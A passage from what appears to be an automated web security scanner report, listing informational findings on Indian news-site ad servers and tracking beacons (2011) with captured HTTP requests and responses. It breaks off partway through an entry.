var h=self.screen.height-self.screen.availHeight;var t=self.screen.availHeight-0;t=t-h;var str="titlebar=no,toolbar=no,scrollbars=no,status=no,resizable=no,controls=no,topmargin=0,leftmargin=0,left=0,
...[SNIP]...

29.9. http://ads.indiatimes.com/ads.dll/getad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.indiatimes.com
Path:   /ads.dll/getad

Request

GET /ads.dll/getad?slotid=4211 HTTP/1.1
Host: ads.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/articlelist/-2128838597.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:35:03 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Expires: Mon, 08 Dec 2008 02:35:03 GMT
Content-Type: text/html
Content-Length: 766

<html><head><title>Indiatimes - Advertisement</title></head><body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" bottommargin="0"><script language="javascript">try{document.domain='indi
...[SNIP]...

29.10. http://ads.indiatimes.com/ads.dll/photoserv  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.indiatimes.com
Path:   /ads.dll/photoserv

Request

GET /ads.dll/photoserv HTTP/1.1
Host: ads.indiatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 04:08:16 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Expires: Mon, 08 Dec 2008 04:08:16 GMT
Content-Type: text/html
Content-Length: 105

<html><head><title>No Active Image Found.</title></head><body><!--No Active Image Found.--></body></html>

29.11. http://adscontent.indiatimes.com/photo.cms  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adscontent.indiatimes.com
Path:   /photo.cms

Request

GET /photo.cms HTTP/1.1
Host: adscontent.indiatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Type: text/html
Content-Length: 184
Expires: Sun, 04 Sep 2011 04:10:24 GMT
Date: Sun, 04 Sep 2011 04:09:24 GMT
Connection: close

<HTML><title> Invalid Parameters 192.169.31.115 </title> <Body> The URL you have requested might no longer exist, has had its name changed, or is temporarily unavailable.</Body></HTML>

29.12. http://adserver.adtechus.com/adrawdata/3.0/5108.1/1446945/0/0/ADTECH  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adrawdata/3.0/5108.1/1446945/0/0/ADTECH

Request

GET /adrawdata/3.0/5108.1/1446945/0/0/ADTECH;kvinvtype=doc;kvexpandable=1;kvdim=fixed_bottom;kvpid=1446945;kvbw=0;kvthrottle=0;misc=1315103282990;kvrid=13232437d63581d89690132a84a8536a HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://core.videoegg.com/bb/pc/vepc.swf?0.7609747000969946
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4E5FAC086E651A4418BD90FFF001676A

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 100

var ve_am = { "housead": "true", "adid" : "1242772-1", "ccid": "1242772-1", "reason": "DELIVERY" };

29.13. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1165705968@Top  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adstil.indiatimes.com
Path:   /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1165705968@Top

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1165705968@Top? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/articlelist/-2128838597.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:34:57 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Set-Cookie: RMFD=011R02OxO206Bs|O108EZ|O108FG|O108KY|O108i0|O108ih; expires=Fri, 31-Dec-2020 23:59:59 GMT; path=/; domain=.indiatimes.com
Content-Length: 183
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<script type='text/javascript'>
var ACE_AR = {site: '800699', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>

29.14. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1324821476@Top  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adstil.indiatimes.com
Path:   /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1324821476@Top

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1324821476@Top? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs|O108ih

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:00:50 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Set-Cookie: RMFD=011R02dtO206Bq|O306Bs|O108EZ|O308FG|O108i0|O108ih; expires=Fri, 31-Dec-2020 23:59:59 GMT; path=/; domain=.indiatimes.com
Content-Length: 245
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<script type="text/javascript">
var CasaleArgs = new Object();
CasaleArgs.version = 2;
CasaleArgs.adUnits = "2";
CasaleArgs.casaleID = 119232;
</script>
<script type="text/javascript" src="http:
...[SNIP]...

29.15. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1352497994@Right3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adstil.indiatimes.com
Path:   /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1352497994@Right3

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1352497994@Right3? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs|O108ih

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:01:27 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Set-Cookie: RMFD=011R02OxO306Bs|O108EZ|O108KY; expires=Fri, 31-Dec-2020 23:59:59 GMT; path=/; domain=.indiatimes.com
Content-Length: 183
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<script type='text/javascript'>
var ACE_AR = {site: '800700', size: '300250'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>

29.16. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1507534702@Right1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adstil.indiatimes.com
Path:   /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1507534702@Right1

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1507534702@Right1? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs|O108ih

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:01:46 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 1438
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<!--
Support: http://adstil.indiatimes.com#OasDefault/3670000929000010THEADVER6209TOIR#Advertisement12Aug#Advertisement12Aug.html#0a87c#1313160034#422#Hc#Right1#www.timesofindia.com/TOI2009_City_Mum
...[SNIP]...

29.17. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1519539382@Right2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adstil.indiatimes.com
Path:   /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1519539382@Right2

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1519539382@Right2? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/articlelist/-2128838597.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:37:19 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 5357
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<!--
Support: http://adstil.indiatimes.com#OasDefault/3670001065000060TIL6203TOIROSMre#82563#GroomingKit-300x250.txt#41ba4#1211878677#422#S#Right2#www.timesofindia.com/TOI2009_City_Mumbai/index.html
...[SNIP]...

29.18. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1679277654@Right1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adstil.indiatimes.com
Path:   /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1679277654@Right1

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1679277654@Right1? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/articlelist/-2128838597.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:36:58 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Set-Cookie: RMFD=011R02OxO106Bq|O306Bs|O108EZ|O108Ea|O108FG|O108KY|O108i0|O108ih; expires=Fri, 31-Dec-2020 23:59:59 GMT; path=/; domain=.indiatimes.com
Content-Length: 245
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<script type="text/javascript">
var CasaleArgs = new Object();
CasaleArgs.version = 2;
CasaleArgs.adUnits = "4";
CasaleArgs.casaleID = 119232;
</script>
<script type="text/javascript" src="http:
...[SNIP]...

29.19. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1801219238@Right2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adstil.indiatimes.com
Path:   /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1801219238@Right2

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1801219238@Right2? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs|O108ih

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:01:48 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Set-Cookie: RMFD=011R02xiO306Bq|O306Bs|O108FG|O108KY|O108i0; expires=Fri, 31-Dec-2020 23:59:59 GMT; path=/; domain=.indiatimes.com
Content-Length: 183
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<script type='text/javascript'>
var ACE_AR = {site: '804611', size: '300250'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>

29.20. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_TOPICS/index.html/1982094345@Right1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adstil.indiatimes.com
Path:   /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_TOPICS/index.html/1982094345@Right1

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_TOPICS/index.html/1982094345@Right1? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/topic/Xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO206Bs|O108EZ|O108FG|O108i0|O108ih; _iibeat_session=02f2ca4f-6c90-4fc2-993c-84fedfef7948

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:35:59 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 1423
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<!--
Support: http://adstil.indiatimes.com#OasDefault/3670000929000010THEADVER6209TOIR#Advertisement12Aug#Advertisement12Aug.html#0a87c#1313160034#422#Hc#Right1#www.timesofindia.com/TOI2009_TOPICS/i
...[SNIP]...

29.21. http://advertising.aol.com/nai/nai.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /nai/nai.php

Request

GET /nai/nai.php?action_id=3 HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 10:59:21 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache, max-age=1
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Expires: Sun, 04 Sep 2011 10:59:22 GMT
Content-Type: text/html
Content-Length: 13500


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script>

   // dynamic variables
   var numFrames = 9;
   var redirectUrlNoCookie = "http://www.networkadvertising.org/verify/no_cookie.gif";
   var redire
...[SNIP]...

29.22. http://api.tweetmeme.com/ajax/partial  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.tweetmeme.com
Path:   /ajax/partial

Request

GET /ajax/partial HTTP/1.1
Host: api.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sun, 04 Sep 2011 04:12:24 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 8.5830688476562E-5
X-Served-In: 0.0010409355163574
X-Served-By: h00
Content-Length: 53

{"response":"failure","data":"Please specify a body"}

29.23. http://api.tweetmeme.com/v2/follow.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.tweetmeme.com
Path:   /v2/follow.js

Request

GET /v2/follow.js?screen_name=ProfitNDTV&style=normal HTTP/1.1
Host: api.tweetmeme.com
Proxy-Connection: keep-alive
Referer: http://social.ndtv.com/NDTVProfit
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sun, 04 Sep 2011 03:38:31 GMT
Content-Type: text/html
Connection: close
P3P: CP="CAO PSA"
X-Served-By: swift
Content-Length: 2735

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml">
           <head>
               <title>TweetMeme F
...[SNIP]...

29.24. http://beacon.videoegg.com/abandoned  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://beacon.videoegg.com
Path:   /abandoned

Request

GET /abandoned?rid=13232437d63581d89690132a84a8536a&prod=doc&tagid=bf0cc1c2f091a8d9d248bd91c646fdfe&curtime=1315103658434&curtz=300&et=382047&ttos=0&state=dm HTTP/1.1
Host: beacon.videoegg.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1918458103-1315103284399

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:33:49 GMT
Server: Apache/2.2.16 (Debian)
Content-Length: 6
Content-Type: text/html

"s2";

29.25. http://beacon.videoegg.com/admodelreceived  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://beacon.videoegg.com
Path:   /admodelreceived

Request

GET /admodelreceived?prod=doc&v=14591&rid=13232437d63581d89690132a84a8536a&tagid=bf0cc1c2f091a8d9d248bd91c646fdfe&dim=fixed_bottom&curtime=1315103283969&et=7582&pui=3afdefa4e88c481b3d934263a005db8f&atstat=no&fcid=1242772-1&art=888&prod=doc&adserv=adtech&tech=bb&reason=DELIVERY HTTP/1.1
Host: beacon.videoegg.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:11:31 GMT
Server: Apache/2.2.16 (Debian)
Content-Length: 6
Content-Type: text/html

"s8";

29.26. http://beacon.videoegg.com/adpo  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://beacon.videoegg.com
Path:   /adpo

Request

GET /adpo?ab=at%2Cod&adserv=adtech&adtechperc=1&adtime=14274&ai=1&ar=0&area=INDIATIMES_US&bw=x&ccid=1977158-1&dim=twig&eapv=14533&expandable=1&fv=10.3.183&g=m&gi=0&loc=INDIATIMES_US_ROS_TWIG&pb=indiatimes&prod=adframes&pstat=exists&pui=3afdefa4e88c481b3d934263a005db8f&reason=null&ref=http%253A%252F%252Ftimesofindia.indiatimes.com%252Fcity%252Fmumbai%252FMy-friend-Ganesha%252Farticleshow%252F9855193.cms&rid=1323243821bd3a2334d85d82f0661701&si=INDIATIMES_US&stat=ad&tech=admanager&totime=17464&type=html&version=2&curtime=1315103298219&curtz=300&ord=8 HTTP/1.1
Host: beacon.videoegg.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1918458103-1315103284399

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:18:23 GMT
Server: Apache/2.2.16 (Debian)
Content-Length: 6
Content-Type: text/html

"s6";

29.27. http://beacon.videoegg.com/amcload  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://beacon.videoegg.com
Path:   /amcload

Request

GET /amcload?adserv=adtech&amctime=3186&area=INDIATIMES_US&fv=10.3.183&handler=invitation&loc=INDIATIMES_US_ROS_TWIG&os=WIN&pb=indiatimes&rid=1323243821bd3a2334d85d82f0661701&si=INDIATIMES_US&tech=admanager&type=html&version=2&curtime=1315103283934&curtz=300&ord=4 HTTP/1.1
Host: beacon.videoegg.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:09:04 GMT
Server: Apache/2.2.16 (Debian)
Content-Length: 6
Content-Type: text/html

"s6";

29.28. http://beacon.videoegg.com/coreloaded  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://beacon.videoegg.com
Path:   /coreloaded

Request

GET /coreloaded?prod=doc&v=14591&rid=13232437d63581d89690132a84a8536a&tagid=bf0cc1c2f091a8d9d248bd91c646fdfe&dim=fixed_bottom&curtime=1315103282955&et=6568&os=Win&fv=10.3.183&tech=bb&x=0&y=0&btf=false&exp=1 HTTP/1.1
Host: beacon.videoegg.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:08:24 GMT
Server: Apache/2.2.16 (Debian)
Content-Length: 6
Content-Type: text/html

"s3";

29.29. http://beacon.videoegg.com/demo  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://beacon.videoegg.com
Path:   /demo

Request

GET /demo?a=x&area=INDIATIMES_US&g=x&m=0&provider=bluekai&pui=3afdefa4e88c481b3d934263a005db8f&rawdata=%7B%22campaigns%22%3A%5B%5D%7D&rid=1323243821bd3a2334d85d82f0661701&si=INDIATIMES_US&t=14118&curtime=1315103298041&curtz=300&ord=7 HTTP/1.1
Host: beacon.videoegg.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1918458103-1315103284399

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:27:40 GMT
Server: Apache/2.2.16 (Debian)
Content-Length: 6
Content-Type: text/html

"s8";

29.30. http://beacon.videoegg.com/domloaded  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://beacon.videoegg.com
Path:   /domloaded

Request

GET /domloaded?prod=doc&v=14591&rid=13232437d63581d89690132a84a8536a&tagid=bf0cc1c2f091a8d9d248bd91c646fdfe&curtime=1315103283068&et=6681 HTTP/1.1
Host: beacon.videoegg.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:08:39 GMT
Server: Apache/2.2.16 (Debian)
Content-Length: 6
Content-Type: text/html

"s6";

29.31. http://beacon.videoegg.com/echo  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://beacon.videoegg.com
Path:   /echo

Request

